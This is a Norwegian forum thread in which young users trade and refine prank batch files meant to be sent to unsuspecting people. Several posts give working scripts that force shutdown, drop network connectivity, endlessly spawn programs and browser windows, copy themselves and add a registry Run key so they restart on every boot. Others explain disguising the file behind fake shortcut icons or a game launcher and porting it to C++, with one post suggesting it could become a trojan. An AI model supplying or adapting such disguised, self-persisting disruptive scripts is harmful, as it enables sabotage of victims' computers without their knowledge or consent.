Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  68 7977
Heisann, jeg og en kammerat sitter å "programer". Vi sitter å lager .bat filer i notepad.

VI har skrevet:
@echo off
cls
shutdown -s -t 600 -c "God Jul, hilsen Fredrik og André"
cmd
ipconfig release
Vis hele sitatet...
* Denne slår av pc en
* Ønsker god jul
* Ser "skummel" ut med at CMD kommer opp hele tiden...
* Gjør at de mister internett


Men vi har lyst til åat den skal gjøre et par ting til.
Vi har lyst til at den f.eks starter et par programmer, f.eks webside eller bilde osv...

Og at den legger seg i oppstart


Hva slags kommandoer er nødvendige???

Takk....
hmm, for og starte noen programmer tar du bare: start notepad f.eks.
Så kan du lage en loop osv.
hmm

Har du kodingen?? Er ganske nybegynnere når det gjelder dette :O

Vis hele sitatet...
Mitt forslag ?
Skal du starte programmer så skriver du bare ganske enkelt inn adressen til den eksekvenserbare (exe-fila) filen til programmet du ønsker å starte. Webbrowsere kan som regel ta parametere på hvilken side den skal kjøres til (under linux kunne jeg eksempelvis har gjort "firefor www.vg.no"). Skal du ha filen under oppstart så er en mulighet å bare kopiere fila til oppstartsmappa (her bruker du kommandoen copy).

Mange programmer som skal startes opp i Windows blir ikke lagt i oppstartsmappa, men derimot i registeret. Det du kan gjøre er å finne ut hvor i registeret oppstartsprogrammene ligger (husker ikke hvor, og jeg kjører linux), legge inn bat filen din der. Deretter eksporterer du registernøkkelen. En eksporterte nøkkelen legger du i lag med bat-fila di. Når du nå skal legge til programmer under oppstart i registeret så kjører du bare register filen, så vil den forhåpentligvis legge seg inn.
Hvordan da?


copy hei.bat to oppstart



Eller er jeg helt på jordet??

Hvordan ??
"copy c:\batfilami.bat d:\batfilami.bat" vil kopiere fila fra c til d. Jeg anbefaler deg å skrive help under cmd så vil du få et oppslag på en rekke kommandoer. Ønsker du mer detaljert informasjon om en kommando, kan du kjøre "help copy".

Forøvrig, det jeg snakket om istad angående registeret. Når du har eksportert registernøkkelen så kan du importere den til registeret slik:

Kode

regedit.exe \registernøkkel.reg
Er bare å prøve og feile litt, så finner du nok ut av ting skal du se.
Du er på jordet
Hele poenget med a den skal flytte seg er at de som trykker på den ikke skal vite at den legger seg der

Derfor må man bare trykke på den. så legger den seg i oppstarts register / mappa.

Samma hva, bare den funker!!!


Noen som kan lage en kode som flytter en fil fra:

* Hvor som helst!

Til:

* Register / oppstart mappe....
Jeg har allerede fortalt deg hvilke kommandoer du trenger. Ditt arbeid nå er kun å finne mappene. Noe som slett ikke er vanskelig i det hele tatt. Selvarbeid skader deg ikke, vet du. Dessuten vil du lære mye mer av at du leter litt selv etter mappene enn om jeg bare forteller deg det.
Jeg mener, går det ann å kopiere den fra hvor som helst??
Dersom filen heter minbatfil.bat så kan du enkelt kopiere filen slik:

Kode

copy minbatfil.bat c:\mappa\du\skal\legge\fila\
Du må jo ha en plass å kopiere den fra, hvis ikke så kan du jo ikke kopiere den. Det sier seg jo selv.
Kommandoen som |d13m0b har skrevet, forutsetter jo at du står i den mappen som .bat filen befinner seg.
Denne koden skal helst fungere på hvem som helst pc.
Vi skal kunne sende filen. Så trykker mottakeren på den,og pcn skrur seg for eks av.
Vil at dette skal skje vær gang pcn skrues på, er dette mulig?

At filen kopieres til oppstart er greit nok men, navnet på oppstart mappen er jo forskjellig fra bruker til bruker..
JA, MEN NÅR DU SKRIVER COPY MINBATFIL.BAT SÅ KOPIERER DEN SEG SELV UAVHENGIG AV HVOR DEN ER! </TESKJE>

Edit: Dessuten, gå for registry editing og lag din egen oppstartsmappe du kopierer fila til.
Det han mener er at alle pc er har forskjellige brukere...

Derfor kan han ikke lage den slik:

C:\Documents and Settings\sfsdfgsgsfgfsg\Start-meny\Programmer\Oppstart

Fordi alle brukere heter ikke: sfsdfgsgsfgfsg



Derfor lurer han på om det finnes en kommando som legger den i f.eks registeret. Det har han på en måte fått svar på!!!
mekka to stk som looper, den ene åpner calculator og åpner den andre .bat fila som gjør det samme. Men cmd window kommer også opp, derfor kan personen lukke vinduet for å slutte prosessen. Hvordan forhindrer jeg dette?

edit: Hvor er oppstarts mappa?
Fedora Contributor
Stringer's Avatar
CDocuments and Settings\All users\Start-meny\Programmer\Oppstart har nå fønka for meg.
Er ikke "DOS-programmering" skrevet i programspråket C ?
Ja dette er mulig. Åpne cmd og skriv help.

Google på "batch programming" om det ikke er nok.
Det finnes også variabler som bestemmer brukernavn og da er det ikke vanskelig å finne ut av hvordan du har en relativt universal startup-mappe.
Dessuten, hvis det er så vanskelig å finne fram til en bruker, så kan han heller legge til en egen universal oppstartsmappe, noe som heller ikke er så veldig vanskelig å gjøre. Og ja, han har fått svar på hvordan han kan importere .reg filer til registeret via ledetekst.
Unger... hehe, nei da... gjorde slikt i 7klasse jeg oxo..
eks:
@echo off
shutdown -s -t 600 -c "God Jul, hilsen Fredrik og André"
copy me.bat cme2.bat
REG ADD HKLM\Software\Microsoft\windows\currentversion\run /v Start1 /t REG_SZ /d "cme2.bat" < y
:start
cls
start http://www.sol.no
goto start
Vis hele sitatet...
Hvis jeg da tester denne... Så vil jeg jo kunne fjeren den igjen uten noen problemer...

Hvilke mappe inne i registeret er det den legger seg??? Hvordan fjerner jeg den på en trykk måte??
fredrikweb:
vel, det står skrevet ganske flott sort på grått, Den legger seg i HKEY_Local_Machine\Software\Microsoft\windows\currentversion \run som string key'en Start1. du kan fjærne den gjennom Regedit eller simpel ved å bruke denne kommandoen i et cmd shell:
Reg delete hklm\Software\Microsoft\wind
ows\currentversion\run /v Start1
Vis hele sitatet...
De fleste oppegående mennesker vil sjekke innholdet av en batch fil før de kjører den
mhm.. å hadde vi alle vært skeptiske nokk hadde vi disassamblet å analysert alle exe filer oxo... ærlig talt, trur du søstra mi, fetteren min eller noen av de gamle lærerene mine hadde gjordt det?
pluss det er sikkert ualige mennesker der ut som aldrig har tatt i en batch fil og skjønner ikke en dritt av det som er scriptet...
De personene det måtte gjelde synes jeg synd på

Du får kose deg, fikk en her til å åpne samme batch fila om og om igjen, minst 5 ganger selvom pcen hennes slo seg av hver gang etter hun hadde starta den.

Ingenting er som å se halve MSNkontaktlista bli logget av
Enig, skikkelig moro...

Det som kan være mer troverdig er hvis man får byttet ikon...

Kan dette gjøres med en kommando?
Lagde denne jeg, og den er som du sikkert skjønner rimelig irriterende!! :P Denne skal funke på alle pcer:

@echo off
shutdown -s -t 300 -c "God FucKings jul!! "
cls
:start
cls
start http://.sol.no
start c:/WINDOWS/Notepad
start c:/WINDOWS/Explorer
goto:start

Og hvis du vil ha denne til å starte om igjen når pc-en blir skrudd på igjen, så bare legger du til det LetMeBleedPLZ sier her!
Enjoy.
Sist endret av Walle; 20. desember 2004 kl. 23:56.
Opprinnelig postet av Walle

shutdown -s -t 300 -c "God Fucings jul!! "
Vis hele sitatet...
Fucings == Fuckings
Noen måte å endre ikonet til noe annet? Slik at de som har bitte litt peiling ikke vet hva d er?
John B, vi er kun mennesker

A_O-MoP, ja, du kan lage en snarvei til denne .BAT filen, så kan du skifte ikon på snarveien.

.Bat fila kan du jo lage en masse mapper og falske snarveier og gjemme blant, så sende hele mappa og be de bare åpne snarveien.
Ja men da så. Da er det ikke noe problem
For å gjøre ting litt mer geekish kan dere heller lære dere litt C eller C++ og lage programmer som gjør samme nytten som batch-filene. System() funksjonen gjør at dere kan kjøre systemkommandoer på samme måte som ved batch, noe som vil si at dere kan kjøre System("start www.vg.no"); Det er ikke mye som skal til for å lage slike enkle programmer og dere burde være i stand til å klare det innen en dag eller to.

Litt mer etterhvert kan dere flette dette inn med nye ikoner for å kamuflere programmene og etterhvert kanskje tilogmed kjøre sockets - da vil det tilslutt bli en finfin trojan.
Har jo

@echo off
TASKKILL /F /IM explorer.exe
start explorer.exe
@exit
Vis hele sitatet...
taskill fjerner bare prosesser fra lista der
He he. Mekka en inn i Liero. Snarvei med Liero ikonet. Men snarveien åpner en bat fil lenger inne i mappene som kjører Liero og slår av maskinen når du lukker spillet innen 10 sec. Men Den første bat filen åpner også en ny bat fil som igjen kjører Liero etter du har lukket det. Og slik looper det. Så da prøver man å lukke det et par ganger for å komme seg ut og slå av shutdown. Men til slutt prøver man å bruke Alt + Tab (som funker), men da er det for seint. hehe
#include <cstdlib>
int main()
{
system("@echo off");
system("start notepad");
system("reg add HKLM\Software\Microsoft\windows\currentversion\run /v start1 /t reg_sz /d "ctest.exe" < y:start");


return 0;

}


Noen som ser hva som er feil med koden der. PS: Er helt ny i C/C++
Er det enkelt å få de samme funskjonene til *.bat inn i ei *.exe fil?
Nja delvis, du ser jo hvordan jeg gjorde det der oppe, støtet på bare noen få problemer. Det er forøvrigt skrevet i C++
Noob question, C++ er et program man skriver koder i for å så lagre dem som exe sant?
Voldern: Hvis du kommenterer ut to av de system funksjonene dine så er det kanskje litt lettere å se hvilken av de som det er noe galt med.

Forøvrig ser du jo at når du skriver en string med " i seg så er det dømt til å gå til faen. Prøv med \" istedet for ".

Kode

 system("reg add HKLM\Software\Microsoft\windows\currentversion\run /v start1
 /t reg_sz /d \"ctest.exe\" < y:start");
Kan man kjøre "@echo off" fra C? Trodde dette var en "cmd-kommando", innebygd i shellet?
ifi:
som tidligere sagt i denne tråden så fungerer shell-kommandoer i C, dersom man bruker system( foran.
F.eks: system("@echo off")

shoot me if I'm wrong


Jeg er absolutt ingen C-guru, men vil da også anta at man kan lage en C-kode som er noe tilnærmet følgende:

system("copy navnpåenfaensfil.bat c:\dettefuckingsområdet\kopiavdenfaensfila.bat");
system("start c:\dettefuckingsområdet\kopiavdenfaensfila.bat");

osvosv....

hadde vært kult med litt feedback på denne... bare en liten brainstorm =D
Hvis dere vil lage enkle(lite kode) script/programmer som kjører system kommandoer så hvorfor ikke bruke python/perl de er jo som skapt for slike ting.
i python:

cmd = "shutdown -s"
os.system(cmd)

eller os.system("shutdown -s")

her er et program skrevet i python ganske raskt med grafisk brukergrensesnitt og som kjører kommando på maskinen din, etter gitt klokkeslett.
Her. jeg har konvertert den til .exe siden de fleste av dere sikkert ikke har python installert. men allikevel så må dere ha hele den mappen som ligger i zip filen, og kjør shut.exe filen.
Ser ut som zip filen var større en antatt 2.5mb så dere får heller se kilde koden.

#!usr/bin/env python

import time,sys,os,tkMessageBox,thread
from Tkinter import *

class shut:
def __init__(self,parent):
self.master=parent
self.fram = Frame(self.master)
self.fram.pack(side='top',padx=30,pady=40,expand=True,fill=' both')
self.tidn = StringVar();
self.tidn.set('00:00:00')
self.txt = Label(self.fram,text='Time to start program')
self.txt.pack(side='top',padx=10)

self.usr_time = Entry(self.fram,textvariable=self.tidn)
self.usr_time.pack(side='top')
self.txt2 = Label(self.fram,text='Enter program to run')
self.txt2.pack(side='top',padx=10)
self.com = Entry(self.fram,text='time')
self.com.pack(side='top')
self.ok = Button(self.fram,text='command',command=self.shutd)
self.ok.pack(side='top')

def shutd(self):
self.usr_time2 = self.usr_time.get()
while True:

self.real_tid = time.ctime()
print self.real_tid[11:19]
self.current = self.real_tid[11:19]
if self.current == self.usr_time2:
print "Running program " + self.com.get()
cmd = self.com.get()
failure = os.system(cmd)
if failure:
tkMessageBox.Message(icon='error',type='ok',message='unable to initiate '+cmd,title='Error').show()
break
break
sys.exit(0)
root = Tk()
root.title('Command 1.0')
shut = shut(root)
root.mainloop()
Men si meg en ting... må man ikke ha python installert på pc'en for at programmer skal funke? Har i hvert fall vært sånn når jeg har prøvd.

Men c++ er helt genialt til akkurat dette formålet. system() er en fin funksjon, og som |d13m0b sier er det ikke mye mer man skal lære seg for at det skal bli mer avansert.
Opprinnelig postet av bashrc
Her. jeg har konvertert den til .exe siden de fleste av dere sikkert ikke har python installert. men allikevel så må dere ha hele den mappen som ligger i zip filen, og kjør shut.exe filen.
Vis hele sitatet...
Aha! Beklager, min feil.
jeg prøvde som sagt å legge ut en zip fil som innholder alt man trenger for å kjøre den konverterte python programmet, men det er vist ikke lov å legge ut mer en 1.25mb her på forumet, hvis noen er interessert så gi meg en ftp jeg kan uploade den til.
Offtopic: Har litt problemer med å gjøre .py filer til .exe, noen som kan forklare hva jeg gjør?